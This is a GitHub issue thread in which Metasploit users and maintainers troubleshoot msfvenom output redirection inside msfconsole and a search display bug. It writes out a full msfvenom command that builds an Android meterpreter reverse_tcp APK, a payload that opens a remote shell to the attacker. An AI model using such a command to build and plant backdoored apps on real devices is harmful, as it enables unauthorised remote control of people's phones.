Metasploit-framework: msfvenom and search problem
So, my metasploit has this problem (after Kali Linux update) that
any payload made with msfvenom seems to work, but gives a huge non readable code or error.
So after typing msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > /root/Desktop/app.apk for example it says:
[*] exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > /root/Desktop/a.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10093 bytes
�N�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O�@��@��"��]T�`B��+8��Z�������
as you can see it begins to create a huge text.
The search function doesn't show the names of the payloads, exploits, ect...
Metasploit 5.0.36-dev
Kali linux
I am new to github by the way
YASYAS123
All 14 comments
I don't think msfvenom within msfconsole is working with the >
You can either do:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R -o /root/Desktop/a.apk
Or, just run msfvenom before you run msfconsole
timwr
on 17 Jul 2019
I don't think msfvenom within msfconsole is working with the >
You can either do:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R -o /root/Desktop/a.apk
Or, just run msfvenom _before_ you run msfconsole
What the hell?
Thank you sooo much!!!
But why does it just work like that? Is it the update? And what's going on with the search command?
And where did you know that?
Again thank you !!!
YASYAS123
on 17 Jul 2019
But why does it just work like that? Is it the update?
It's likely an issue with the Metsploit package on Kali, in combination with Ruby dependencies. It may or may not be a result of an update to Kali packages.
And what's going on with the search command?
What's wrong with the search command?
bcoles
on 17 Jul 2019
But why does it just work like that? Is it the update?
It's likely an issue with the Metsploit package on Kali, in combination with Ruby dependencies. It may or may not be a result of an update to Kali packages.
And what's going on with the search command?
What's wrong with the
searchcommand?
Hm, ok strange...
The search command doesn't show the names of the exploits etc...
But it did before the update
YASYAS123
on 17 Jul 2019
Thank you guys, didn't expect so much help ^^
I am new here and this was the first thing I asked on Github,
thank you.
YASYAS123
on 17 Jul 2019
Search works fine for me...
Kali metasploit-framework package (5.0.36-0kali1)
# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v5.0.36-dev ]
+ -- --=[ 1905 exploits - 1073 auxiliary - 329 post ]
+ -- --=[ 545 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search librenms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection
master branch
# ./msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
PPPPP IIIIIII N N
P PP I NN N IDENTIFICATION
P PP I N N N
PPPPP I N N N PROGRAM
P I N NN
P IIIIIII N N
Strike a key when ready ...
=[ metasploit v5.0.37-dev-182c8a23f4 ]
+ -- --=[ 1930 exploits - 1077 auxiliary - 332 post ]
+ -- --=[ 552 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search librenms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection
msf5 >
Search works fine for me...
Kali metasploit-framework package (5.0.36-0kali1)
# msfconsole [-] ***rting the Metasploit Framework console.../ [-] * WARNING: No database support: No database YAML file [-] *** _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v5.0.36-dev ] + -- --=[ 1905 exploits - 1073 auxiliary - 329 post ] + -- --=[ 545 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 > search librenms Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection
masterbranch# ./msfconsole [-] ***rting the Metasploit Framework console...| [-] * WARNING: No database support: No database YAML file [-] *** PPPPP IIIIIII N N P PP I NN N IDENTIFICATION P PP I N N N PPPPP I N N N PROGRAM P I N NN P IIIIIII N N Strike a key when ready ... =[ metasploit v5.0.37-dev-182c8a23f4 ] + -- --=[ 1930 exploits - 1077 auxiliary - 332 post ] + -- --=[ 552 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 > search librenms Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection msf5 >
Yes I see...
Then I am the only one I think xD
YASYAS123
on 17 Jul 2019
Do you get any console output? Are there any errors in ~/.msf4/logs/framework.log ?
bcoles
on 17 Jul 2019
Do you get any console output? Are there any errors in
~/.msf4/logs/framework.log?
Yes it shows everything except of the names of the payloads, exploit, etc...
I don't know if there are any errors.
YASYAS123
on 17 Jul 2019
@YASYAS123 Is this issue resolved? Is the search function working for you now?
bcoles
on 2 Sep 2019
I am also facing the same problem. Search does show exploit Names.
Example:
msf5 > search wp
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 2014-08-07 normal No WordPress custom-contact-forms Plugin SQL Upload
1 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation
2 2018-11-08 normal Yes WordPress WP GDPR Compliance Plugin Privilege Escalation
3 2019-04-02 normal Yes WordPress Google Maps Plugin SQL Injection
4 2015-08-18 normal Yes WordPress Symposium Plugin SQL Injection
5 2015-02-09 normal Yes WordPress WPLMS Theme Privilege Escalation
6 normal No NetBIOS Response Brute Force Spoof (Direct)
7 2012-11-01 normal No SAP ConfigServlet OS Command Execution
8 normal No WordPress Traversal Directory DoS
9 2014-11-20 normal No WordPress Long Password DoS
10 2014-08-06 normal No Wordpress XMLRPC DoS
11 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
12 2014-05-09 normal No AlienVault Authenticated SQL Injection Arbitrary File Read
13 normal No Snare Lite for Windows Registry Access
14 2015-03-19 normal Yes WordPress All-in-One Migration Export
15 2015-02-02 normal Yes WordPress Ultimate CSV Importer User Table Extract
16 normal Yes WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
17 normal Yes Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database
18 normal Yes Joomla Page Scanner
19 normal Yes Joomla Plugins Scanner
20 normal Yes Joomla Version Scanner
21 2017-02-01 normal Yes WordPress REST API Content Injection
22 2015-03-03 normal Yes WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
23 2018-06-26 normal No Wordpress Arbitrary File Deletion
24 2015-02-24 normal Yes WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
25 normal Yes WordPress DukaPress Plugin File Read Vulnerability
26 normal Yes WordPress GI-Media Library Plugin Directory Traversmsf5 > search wp
jaswanthsoppa
on 22 Sep 2019
What OS and msf version?
h00die
on 22 Sep 2019
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
![github-actions[bot] picture](https://avatars2.githubusercontent.com/in/15368?v=4&s=40)
github-actions[bot]
on 19 Oct 2020
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
github-actions[bot]
on 19 Nov 2020
Related issues
jecoliho
·
3Comments
felipee07
·
3Comments
Funeoz
·
3Comments
Sonya2010
·
3Comments
wvu-r7
·
3Comments